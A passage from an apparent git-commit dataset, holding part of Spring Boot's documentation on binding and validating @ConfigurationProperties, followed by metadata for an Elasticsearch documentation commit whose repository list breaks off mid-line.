so:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/constructorbinding\/nonnull\/MyProperties.java[tag=*]\n----\n\n\nNOTE: To use constructor binding the class must be enabled using `@EnableConfigurationProperties` or configuration property scanning.\nYou cannot use constructor binding with beans that are created by the regular Spring mechanisms (for example `@Component` beans, beans created by using `@Bean` methods or beans loaded by using `@Import`)\n\nTIP: If you have more than one constructor for your class you can also use `@ConstructorBinding` directly on the constructor that should be bound.\n\nNOTE: The use of `java.util.Optional` with `@ConfigurationProperties` is not recommended as it is primarily intended for use as a return type.\nAs such, it is not well-suited to configuration property injection.\nFor consistency with properties of other types, if you do declare an `Optional` property and it has no value, `null` rather than an empty `Optional` will be bound.\n\n\n\n[[features.external-config.typesafe-configuration-properties.enabling-annotated-types]]\n==== Enabling @ConfigurationProperties-annotated types\nSpring Boot provides infrastructure to bind `@ConfigurationProperties` types and register them as beans.\nYou can either enable configuration properties on a class-by-class basis or enable configuration property scanning that works in a similar manner to component scanning.\n\nSometimes, classes annotated with `@ConfigurationProperties` might not be suitable for scanning, for example, if you're developing your own auto-configuration or you want to enable them conditionally.\nIn these cases, specify the list of types to process using the `@EnableConfigurationProperties` annotation.\nThis can be done on any `@Configuration` class, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/enablingannotatedtypes\/MyConfiguration.java[]\n----\n\nTo use configuration property scanning, add the `@ConfigurationPropertiesScan` annotation to your application.\nTypically, it is added to the main application class that is annotated with `@SpringBootApplication` but it can be added to any `@Configuration` class.\nBy default, scanning will occur from the package of the class that declares the annotation.\nIf you want to define specific packages to scan, you can do so as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/enablingannotatedtypes\/MyApplication.java[]\n----\n\n[NOTE]\n====\nWhen the `@ConfigurationProperties` bean is registered using configuration property scanning or through `@EnableConfigurationProperties`, the bean has a conventional name: `<prefix>-<fqn>`, where `<prefix>` is the environment key prefix specified in the `@ConfigurationProperties` annotation and `<fqn>` is the fully qualified name of the bean.\nIf the annotation does not provide any prefix, only the fully qualified name of the bean is used.\n\nThe bean name in the example above is `com.example.app-com.example.app.SomeProperties`.\n====\n\nWe recommend that `@ConfigurationProperties` only deal with the environment and, in particular, does not inject other beans from the context.\nFor corner cases, setter injection can be used or any of the `*Aware` interfaces provided by the framework (such as `EnvironmentAware` if you need access to the `Environment`).\nIf you still want to inject other beans using the constructor, the configuration properties bean must be annotated with `@Component` and use JavaBean-based property binding.\n\n\n\n[[features.external-config.typesafe-configuration-properties.using-annotated-types]]\n==== Using @ConfigurationProperties-annotated types\nThis style of configuration works particularly well with the `SpringApplication` external YAML configuration, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tmy:\n\t service:\n\t remote-address: 192.168.1.1\n\t security:\n\t username: \"admin\"\n\t roles:\n\t - \"USER\"\n\t - \"ADMIN\"\n----\n\nTo work with `@ConfigurationProperties` beans, you can inject them in the same way as any other bean, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/usingannotatedtypes\/MyService.java[]\n----\n\nTIP: Using `@ConfigurationProperties` also lets you generate metadata files that can be used by IDEs to offer auto-completion for your own keys.\nSee the <<configuration-metadata#appendix.configuration-metadata,appendix>> for details.\n\n\n\n[[features.external-config.typesafe-configuration-properties.third-party-configuration]]\n==== Third-party Configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it on public `@Bean` methods.\nDoing so can be particularly useful when you want to bind properties to third-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to its bean registration, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/thirdpartyconfiguration\/ThirdPartyConfiguration.java[]\n----\n\nAny JavaBean property defined with the `another` prefix is mapped onto that `AnotherComponent` bean in manner similar to the preceding `SomeProperties` example.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding]]\n==== Relaxed Binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to `@ConfigurationProperties` beans, so there does not need to be an exact match between the `Environment` property name and the bean property name.\nCommon examples where this is useful include dash-separated environment properties (for example, `context-path` binds to `contextPath`), and capitalized environment properties (for example, `PORT` binds to `port`).\n\nAs an example, consider the following `@ConfigurationProperties` class:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/relaxedbinding\/MyPersonProperties.java[]\n----\n\nWith the preceding code, the following properties names can all be used:\n\n.relaxed binding\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n| `my.main-project.person.first-name`\n| Kebab case, which is recommended for use in `.properties` and `.yml` files.\n\n| `my.main-project.person.firstName`\n| Standard camel case syntax.\n\n| `my.main-project.person.first_name`\n| Underscore notation, which is an alternative format for use in `.properties` and `.yml` files.\n\n| `MY_MAINPROJECT_PERSON_FIRSTNAME`\n| Upper case format, which is recommended when using system environment variables.\n|===\n\nNOTE: The `prefix` value for the annotation _must_ be in kebab case (lowercase and separated by `-`, such as `my.main-project.person`).\n\n.relaxed binding rules per property source\n[cols=\"2,4,4\"]\n|===\n| Property Source | Simple | List\n\n| Properties Files\n| Camel case, kebab case, or underscore notation\n| Standard list syntax using `[ ]` or comma-separated values\n\n| YAML Files\n| Camel case, kebab case, or underscore notation\n| Standard YAML list syntax or comma-separated values\n\n| Environment Variables\n| Upper case format with underscore as the delimiter (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>).\n| Numeric values surrounded by underscores (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>)\n\n| System properties\n| Camel case, kebab case, or underscore notation\n| Standard list syntax using `[ ]` or comma-separated values\n|===\n\nTIP: We recommend that, when possible, properties are stored in lower-case kebab format, such as `my.person.first-name=Rod`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding.maps]]\n===== Binding Maps\nWhen binding to `Map` properties you may need to use a special bracket notation so that the original `key` value is preserved.\nIf the key is not surrounded by `[]`, any characters that are not alpha-numeric, `-` or `.` are removed.\n\nFor example, consider binding the following properties to a `Map<String,String>`:\n\n\n[source,properties,indent=0,subs=\"verbatim\",role=\"primary\"]\n.Properties\n----\n\tmy.map.[\/key1]=value1\n\tmy.map.[\/key2]=value2\n\tmy.map.\/key3=value3\n----\n\n[source,yaml,indent=0,subs=\"verbatim\",role=\"secondary\"]\n.Yaml\n----\n\tmy:\n\t map:\n\t \"[\/key1]\": \"value1\"\n\t \"[\/key2]\": \"value2\"\n\t \"\/key3\": \"value3\"\n----\n\nNOTE: For YAML files, the brackets need to be surrounded by quotes for the keys to be parsed properly.\n\nThe properties above will bind to a `Map` with `\/key1`, `\/key2` and `key3` as the keys in the map.\nThe slash has been removed from `key3` because it was not surrounded by square brackets.\n\nWhen binding to scalar values, keys with `.` in them do not need to be surrounded by `[]`.\nScalar values include enums and all types in the `java.lang` package except for `Object`.\nBinding `a.b=c` to `Map<String, String>` will preserve the `.` in the key and return a Map with the entry `{\"a.b\"=\"c\"}`.\nFor any other types you need to use the bracket notation if your `key` contains a `.`.\nFor example, binding `a.b=c` to `Map<String, Object>` will return a Map with the entry `{\"a\"={\"b\"=\"c\"}}` whereas `[a.b]=c` will return a Map with the entry `{\"a.b\"=\"c\"}`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables]]\n===== Binding from Environment Variables\nMost operating systems impose strict rules around the names that can be used for environment variables.\nFor example, Linux shell variables can contain only letters (`a` to `z` or `A` to `Z`), numbers (`0` to `9`) or the underscore character (`_`).\nBy convention, Unix shell variables will also have their names in UPPERCASE.\n\nSpring Boot's relaxed binding rules are, as much as possible, designed to be compatible with these naming restrictions.\n\nTo convert a property name in the canonical-form to an environment variable name you can follow these rules:\n\n* Replace dots (`.`) with underscores (`_`).\n* Remove any dashes (`-`).\n* Convert to uppercase.\n\nFor example, the configuration property `spring.main.log-startup-info` would be an environment variable named `SPRING_MAIN_LOGSTARTUPINFO`.\n\nEnvironment variables can also be used when binding to object lists.\nTo bind to a `List`, the element number should be surrounded with underscores in the variable name.\n\nFor example, the configuration property `my.service[0].other` would use an environment variable named `MY_SERVICE_0_OTHER`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.merging-complex-types]]\n==== Merging Complex Types\nWhen lists are configured in more than one place, overriding works by replacing the entire list.\n\nFor example, assume a `MyPojo` object with `name` and `description` attributes that are `null` by default.\nThe following example exposes a list of `MyPojo` objects from `MyProperties`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/mergingcomplextypes\/list\/MyProperties.java[]\n----\n\nConsider the following configuration:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t list:\n\t - name: \"my name\"\n\t description: \"my description\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t list:\n\t - name: \"my another name\"\n----\n\nIf the `dev` profile is not active, `MyProperties.list` contains one `MyPojo` entry, as previously defined.\nIf the `dev` profile is enabled, however, the `list` _still_ contains only one entry (with a name of `my another name` and a description of `null`).\nThis configuration _does not_ add a second `MyPojo` instance to the list, and it does not merge the items.\n\nWhen a `List` is specified in multiple profiles, the one with the highest priority (and only that one) is used.\nConsider the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t list:\n\t - name: \"my name\"\n\t description: \"my description\"\n\t - name: \"another name\"\n\t description: \"another description\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t list:\n\t - name: \"my another name\"\n----\n\nIn the preceding example, if the `dev` profile is active, `MyProperties.list` contains _one_ `MyPojo` entry (with a name of `my another name` and a description of `null`).\nFor YAML, both comma-separated lists and YAML lists can be used for completely overriding the contents of the list.\n\nFor `Map` properties, you can bind with property values drawn from multiple sources.\nHowever, for the same property in multiple sources, the one with the highest priority is used.\nThe following example exposes a `Map<String, MyPojo>` from `MyProperties`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/mergingcomplextypes\/map\/MyProperties.java[]\n----\n\nConsider the following configuration:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t map:\n\t key1:\n\t name: \"my name 1\"\n\t description: \"my description 1\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t map:\n\t key1:\n\t name: \"dev name 1\"\n\t key2:\n\t name: \"dev name 2\"\n\t description: \"dev description 2\"\n----\n\nIf the `dev` profile is not active, `MyProperties.map` contains one entry with key `key1` (with a name of `my name 1` and a description of `my description 1`).\nIf the `dev` profile is enabled, however, `map` contains two entries with keys `key1` (with a name of `dev name 1` and a description of `my description 1`) and `key2` (with a name of `dev name 2` and a description of `dev description 2`).\n\nNOTE: The preceding merging rules apply to properties from all property sources, and not just files.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion]]\n==== Properties Conversion\nSpring Boot attempts to coerce the external application properties to the right type when it binds to the `@ConfigurationProperties` beans.\nIf you need custom type conversion, you can provide a `ConversionService` bean (with a bean named `conversionService`) or custom property editors (through a `CustomEditorConfigurer` bean) or custom `Converters` (with bean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to limit the dependencies that your `ConversionService` is using.\nTypically, any dependency that you require may not be fully initialized at creation time.\nYou may want to rename your custom `ConversionService` if it is not required for configuration keys coercion and only rely on custom converters qualified with `@ConfigurationPropertiesBinding`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.durations]]\n===== Converting Durations\nSpring Boot has dedicated support for expressing durations.\nIf you expose a `java.time.Duration` property, the following formats in application properties are available:\n\n* A regular `long` representation (using milliseconds as the default unit unless a `@DurationUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Duration.html#parse-java.lang.CharSequence-[used by `java.time.Duration`]\n* A more readable format where the value and the unit are coupled (`10s` means 10 seconds)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a session timeout of 30 seconds, `30`, `PT30S` and `30s` are all equivalent.\nA read timeout of 500ms can be specified in any of the following form: `500`, `PT0.5S` and `500ms`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `ns` for nanoseconds\n* `us` for microseconds\n* `ms` for milliseconds\n* `s` for seconds\n* `m` for minutes\n* `h` for hours\n* `d` for days\n\nThe default unit is milliseconds and can be overridden using `@DurationUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/constructorbinding\/MyProperties.java[]\n----\n\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DurationUnit`) if it is not milliseconds.\nDoing so gives a transparent upgrade path while supporting a much richer format.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.periods]]\n===== Converting periods\nIn addition to durations, Spring Boot can also work with `java.time.Period` type.\nThe following formats can be used in application properties:\n\n* An regular `int` representation (using days as the default unit unless a `@PeriodUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Period.html#parse-java.lang.CharSequence-[used by `java.time.Period`]\n* A simpler format where the value and the unit pairs are coupled (`1y3d` means 1 year and 3 days)\n\nThe following units are supported with the simple format:\n\n* `y` for years\n* `m` for months\n* `w` for weeks\n* `d` for days\n\nNOTE: The `java.time.Period` type never actually stores the number of weeks, it is a shortcut that means \"`7 days`\".\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.data-sizes]]\n===== Converting Data Sizes\nSpring Framework has a `DataSize` value type that expresses a size in bytes.\nIf you expose a `DataSize` property, the following formats in application properties are available:\n\n* A regular `long` representation (using bytes as the default unit unless a `@DataSizeUnit` has been specified)\n* A more readable format where the value and the unit are coupled (`10MB` means 10 megabytes)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/datasizes\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a buffer size of 10 megabytes, `10` and `10MB` are equivalent.\nA size threshold of 256 bytes can be specified as `256` or `256B`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `B` for bytes\n* `KB` for kilobytes\n* `MB` for megabytes\n* `GB` for gigabytes\n* `TB` for terabytes\n\nThe default unit is bytes and can be overridden using `@DataSizeUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/datasizes\/constructorbinding\/MyProperties.java[]\n----\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DataSizeUnit`) if it is not bytes.\nDoing so gives a transparent upgrade path while supporting a much richer format.\n\n\n\n[[features.external-config.typesafe-configuration-properties.validation]]\n==== @ConfigurationProperties Validation\nSpring Boot attempts to validate `@ConfigurationProperties` classes whenever they are annotated with Spring's `@Validated` annotation.\nYou can use JSR-303 `javax.validation` constraint annotations directly on your configuration class.\nTo do so, ensure that a compliant JSR-303 implementation is on your classpath and then add constraint annotations to your fields, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/validate\/MyProperties.java[]\n----\n\nTIP: You can also trigger validation by annotating the `@Bean` method that creates the configuration properties with `@Validated`.\n\nTo ensure that validation is always triggered for nested properties, even when no properties are found, the associated field must be annotated with `@Valid`.\nThe following example builds on the preceding `MyProperties` example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/validate\/nested\/MyProperties.java[]\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called `configurationPropertiesValidator`.\nThe `@Bean` method should be declared `static`.\nThe configuration properties validator is created very early in the application's lifecycle, and declaring the `@Bean` method as static lets the bean be created without having to instantiate the `@Configuration` class.\nDoing so avoids any problems that may be caused by early instantiation.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all `@ConfigurationProperties` beans.\nPoint your web browser to `\/actuator\/configprops` or use the equivalent JMX endpoint.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.typesafe-configuration-properties.vs-value-annotation]]\n==== @ConfigurationProperties vs. @Value\nThe `@Value` annotation is a core container feature, and it does not provide the same features as type-safe configuration properties.\nThe following table summarizes the features that are supported by `@ConfigurationProperties` and `@Value`:\n\n[cols=\"4,2,2\"]\n|===\n| Feature |`@ConfigurationProperties` |`@Value`\n\n| <<features#features.external-config.typesafe-configuration-properties.relaxed-binding,Relaxed binding>>\n| Yes\n| Limited (see <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation.note,note below>>)\n\n| <<configuration-metadata#appendix.configuration-metadata,Meta-data support>>\n| Yes\n| No\n\n| `SpEL` evaluation\n| No\n| Yes\n|===\n\n[[features.external-config.typesafe-configuration-properties.vs-value-annotation.note]]\nNOTE: If you do want to use `@Value`, we recommend that you refer to property names using their canonical form (kebab-case using only lowercase letters).\nThis will allow Spring Boot to use the same logic as it does when relaxed binding `@ConfigurationProperties`.\nFor example, `@Value(\"{demo.item-price}\")` will pick up `demo.item-price` and `demo.itemPrice` forms from the `application.properties` file, as well as `DEMO_ITEMPRICE` from the system environment.\nIf you used `@Value(\"{demo.itemPrice}\")` instead, `demo.item-price` and `DEMO_ITEMPRICE` would not be considered.\n\nIf you define a set of configuration keys for your own components, we recommend you group them in a POJO annotated with `@ConfigurationProperties`.\nDoing so will provide you with structured, type-safe object that you can inject into your own beans.\n\n`SpEL` expressions from <<features#features.external-config.files,application property files>> are not processed at time of parsing these files and populating the environment.\nHowever, it is possible to write a `SpEL` expression in `@Value`.\nIf the value of a property from an application property file is a `SpEL` expression, it will be evaluated when consumed through `@Value`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92abfc8e24f93ce994811c2982a5c598cc8502cd","subject":"Docs: Update minimum-should-match.asciidoc","message":"Docs: Update minimum-should-match.asciidoc\n\nAdd %-sign to examle in the last section\n\nCloses #8157\n","repos":"ckclark\/elasticsearch,xingguang2013\/elasticsearch,kenshin233\/elasticsearch,milodky\/elasticsearch,jsgao0\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,socialrank\/elasticsearch,aglne\/elasticsearch,fooljohnny\/elasticsearch,wimvds\/elasticsearch,nrkkalyan\/elasticsearch,achow\/elasticsearch,lzo\/elasticsearch-1,alexbrasetvik\/elasticsearch,bestwpw\/elasticsearch,ulkas\/elasticsearch,rhoml\/elasticsearch,wbowling\/elasticsearch,hanswang\/elasticsearch,mbrukman\/elasticsearch,NBSW\/elasticsearch,sdauletau\/elasticsearch,dataduke\/elasticsearch,Chhunlong\/elasticsearch,jimczi\/elasticsearch,nrkkalyan\/elasticsearch,elancom\/elasticsearch,MichaelLiZhou\/elasticsearch,alexkuk\/elasticsearch,Brijeshrpatel9\/elasticsearch,vvcephei\/elasticsearch,wenpos\/elasticsearch,markharwood\/elasticsearch,sreeramjayan\/elasticsearch,luiseduardohdbackup\/elasticsearch,springning\/elasticsearch,btiernay\/elasticsearch,mmaracic\/elasticsearch,strapdata\/elassandra-test,andrestc\/elasticsearch,jprante\/elasticsearch,xuzha\/elasticsearch,achow\/elasticsearch,jango2015\/elasticsearch,luiseduardohdbackup\/elasticsearch,Shekharrajak\/elasticsearch,snikch\/elasticsearch,sposam\/elasticsearch,diendt\/elasticsearch,dataduke\/elasticsearch,iamjakob\/elasticsearch,vingupta3\/elasticsearch,18098924759\/elasticsearch,sauravmondallive\/elasticsearch,girirajsharma\/elasticsearch,acchen97\/elasticsearch,nezirus\/elasticsearch,Clairebi\/ElasticsearchClone,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,pritishppai\/elasticsearch,acchen97\/elasticsearch,tkssharma\/elasticsearch,VukDukic\/elasticsearch,heng4fun\/elasticsearch,EasonYi\/elasticsearch,feiqitian\/elasticsearch,vietlq\/elasticsearch,scottsom\/elasticsearch,djschny\/elasticsearch,pranavraman\/elasticsearch,ImpressTV\/elasticsearch,scorpionvicky\/elasticsearch,elancom\/elasticsearch,iamjakob\/elasticsearch,nazarewk\/elasticsearch,Collaborne\/elasticsearch,Siddartha07\/elasticsearch,MichaelLiZhou\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,lchennup\/elasticsearch,ricardocerq\/elasticsearch,i-am-Nathan\/elasticsearch,Widen\/elasticsearch,girirajsharma\/elasticsearch,AleksKochev\/elasticsearch,artnowo\/elasticsearch,weipinghe\/elasticsearch,Chhunlong\/elasticsearch,polyfractal\/elasticsearch,JackyMai\/elasticsearch,nilabhsagar\/elasticsearch,kimimj\/elasticsearch,fooljohnny\/elasticsearch,jsgao0\/elasticsearch,mute\/elasticsearch,palecur\/elasticsearch,scorpionvicky\/elasticsearch,kingaj\/elasticsearch,mm0\/elasticsearch,lchennup\/elasticsearch,vroyer\/elassandra,mgalushka\/elasticsearch,jw0201\/elastic,ulkas\/elasticsearch,alexkuk\/elasticsearch,GlenRSmith\/elasticsearch,golubev\/elasticsearch,Chhunlong\/elasticsearch,queirozfcom\/elasticsearch,vingupta3\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,petmit\/elasticsearch,TonyChai24\/ESSource,PhaedrusTheGreek\/elasticsearch,fernandozhu\/elasticsearch,kunallimaye\/elasticsearch,chrismwendt\/elasticsearch,Flipkart\/elasticsearch,mmaracic\/elasticsearch,a2lin\/elasticsearch,caengcjd\/elasticsearch,elancom\/elasticsearch,caengcjd\/elasticsearch,wittyameta\/elasticsearch,kcompher\/elasticsearch,hirdesh2008\/elasticsearch,robin13\/elasticsearch,Collaborne\/elasticsearch,mapr\/elasticsearch,wayeast\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,masterweb121\/elasticsearch,kenshin233\/elasticsearch,KimTaehee\/elasticsearch,adrianbk\/elasticsearch,nellicus\/elasticsearch,davidvgalbraith\/elasticsearch,nomoa\/elasticsearch,queirozfcom\/elasticsearch,wangyuxue\/elasticsearch,tsohil\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Flipkart\/elasticsearch,Clairebi\/ElasticsearchClone,kunallimaye\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,pritishppai\/elasticsearch,Ansh90\/elasticsearch,fooljohnny\/elasticsearch,knight1128\/elasticsearch,sdauletau\/elasticsearch,robin13\/elasticsearch,truemped\/elasticsearch,djschny\/elasticsearch,zeroctu\/elasticsearch,iacdingping\/elasticsearch,kaneshin\/elasticsearch,Ansh90\/elasticsearch,Asimov4\/elasticsearch,ThalaivaStars\/OrgRepo1,chrismwendt\/elasticsearch,uschindler\/elasticsearch,tahaemin\/elasticsearch,feiqitian\/elasticsearch,tahaemin\/elasticsearch,huanzhong\/elasticsearch,fforbeck\/elasticsearch,gfyoung\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,kcompher\/elasticsearch,linglaiyao1314\/elasticsearch,zhiqinghuang\/elasticsearch,smflorentino\/elasticsearch,sarwarbhuiyan\/elasticsearch,vingupta3\/elasticsearch,amit-shar\/elasticsearch,trangvh\/elasticsearch,palecur\/elasticsearch,aglne\/elasticsearch,kalburgimanjunath\/elasticsearch,sdauletau\/elasticsearch,yuy168\/elasticsearch,EasonYi\/elasticsearch,YosuaMichael\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,jpountz\/elasticsearch,andrejserafim\/elasticsearch,hanswang\/elasticsearch,18098924759\/elasticsearch,naveenhooda2000\/elasticsearch,himanshuag\/elasticsearch,girirajsharma\/elasticsearch,cnfire\/elasticsearch-1,overcome\/elasticsearch,avikurapati\/elasticsearch,MjAbuz\/elasticsearch,tsohil\/elasticsearch,coding0011\/elasticsearch,nezirus\/elasticsearch,episerver\/elasticsearch,hanswang\/elasticsearch,mjason3\/elasticsearch,pritishppai\/elasticsearch,mkis-\/elasticsearch,gingerwizard\/elasticsearch,ESamir\/elasticsearch,Charlesdong\/elasticsearch,clintongormley\/elasticsearch,petmit\/elasticsearch,jw0201\/elastic,dpursehouse\/elasticsearch,Brijeshrpatel9\/elasticsearch,franklanganke\/elasticsearch,hafkensite\/elasticsearch,wayeast\/elasticsearch,schonfeld\/elasticsearch,jchampion\/elasticsearch,ESamir\/elasticsearch,lightslife\/elasticsearch,nezirus\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,clintongormley\/elasticsearch,zhiqinghuang\/elasticsearch,vietlq\/elasticsearch,gfyoung\/elasticsearch,sauravmondallive\/elasticsearch,andrejserafim\/elasticsearch,diendt\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,kkirsche\/elasticsearch,xpandan\/elasticsearch,drewr\/elasticsearch,IanvsPoplicola\/elasticsearch,tebriel\/elasticsearch,mcku\/elasticsearch,alexshadow007\/elasticsearch,jaynblue\/elasticsearch,sposam\/elasticsearch,jsgao0\/elasticsearch,TonyChai24\/ESSource,sc0ttkclark\/elasticsearch,thecocce\/elasticsearch,fred84\/elasticsearch,Collaborne\/elasticsearch,alexkuk\/elasticsearch,henakamaMSFT\/elasticsearch,dylan8902\/elasticsearch,Microsoft\/elasticsearch,Siddartha07\/elasticsearch,rento19962\/elasticsearch,aglne\/elasticsearch,andrejserafim\/elasticsearch,Microsoft\/elasticsearch,hafkensite\/elasticsearch,milodky\/elasticsearch,hydro2k\/elasticsearch,karthikjaps\/elasticsearch,micpalmia\/elasticsearch,rhoml\/elasticsearch,achow\/elasticsearch,onegambler\/elasticsearch,mrorii\/elasticsearch,ESamir\/elasticsearch,AndreKR\/elasticsearch,F0lha\/elasticsearch,Fsero\/elasticsearch,VukDukic\/elasticsearch,easonC\/elasticsearch,amit-shar\/elasticsearch,szroland\/elasticsearch,YosuaMichael\/elasticsearch,VukDukic\/elasticsearch,xingguang2013\/elasticsearch,humandb\/elasticsearch,iantruslove\/elasticsearch,kalimatas\/elasticsearch,Chhunlong\/elasticsearch,kevinkluge\/elasticsearch,kalimatas\/elasticsearch,MichaelLiZhou\/elasticsearch,masterweb121\/elasticsearch,rlugojr\/elasticsearch,rento19962\/elasticsearch,MichaelLiZhou\/elasticsearch,Microsoft\/elasticsearch,vietlq\/elasticsearch,elasticdog\/elasticsearch,hechunwen\/elasticsearch,cwurm\/elasticsearch,trangvh\/elasticsearch,sreeramjayan\/elasticsearch,anti-social\/elasticsearch,codebunt\/elasticsearch,infusionsoft\/elasticsearch,Ansh90\/elasticsearch,dylan8902\/elasticsearch,NBSW\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,VukDukic\/elasticsearch,drewr\/elasticsearch,onegambler\/elasticsearch,schonfeld\/elasticsearch,xingguang2013\/elasticsearch,TonyChai24\/ESSource,strapdata\/elassandra,Siddartha07\/elasticsearch,gingerwizard\/elasticsearch,tahaemin\/elasticsearch,mcku\/elasticsearch,djschny\/elasticsearch,maddin2016\/elasticsearch,huanzhong\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,Ansh90\/elasticsearch,tkssharma\/elasticsearch,ZTE-PaaS\/elasticsearch,huanzhong\/elasticsearch,khiraiwa\/elasticsearch,iacdingping\/elasticsearch,weipinghe\/elasticsearch,markharwood\/elasticsearch,wuranbo\/elasticsearch,vroyer\/elasticassandra,yynil\/elasticsearch,queirozfcom\/elasticsearch,naveenhooda2000\/elasticsearch,mapr\/elasticsearch,tcucchietti\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,linglaiyao1314\/elasticsearch,beiske\/elasticsearch,bestwpw\/elasticsearch,apepper\/elasticsearch,liweinan0423\/elasticsearch,ouyangkongtong\/elasticsearch,YosuaMichael\/elasticsearch,nomoa\/elasticsearch,Siddartha07\/elasticsearch,Clairebi\/ElasticsearchClone,Brijeshrpatel9\/elasticsearch,kkirsche\/elasticsearch,mnylen\/elasticsearch,bawse\/elasticsearch,skearns64\/elasticsearch,mbrukman\/elasticsearch,nknize\/elasticsearch,alexkuk\/elasticsearch,koxa29\/elasticsearch,kkirsche\/elasticsearch,queirozfcom\/elasticsearch,AshishThakur\/elasticsearch,AndreKR\/elasticsearch,micpalmia\/elasticsearch,markharwood\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,vingupta3\/elasticsearch,Shepard1212\/elasticsearch,sjohnr\/elasticsearch,lmtwga\/elasticsearch,artnowo\/elasticsearch,wuranbo\/elasticsearch,golubev\/elasticsearch,jchampion\/elasticsearch,KimTaehee\/elasticsearch,yongminxia\/elasticsearch,pranavraman\/elasticsearch,Liziyao\/elasticsearch,hafkensite\/elasticsearch,humandb\/elasticsearch,jbertouch\/elasticsearch,elasticdog\/elasti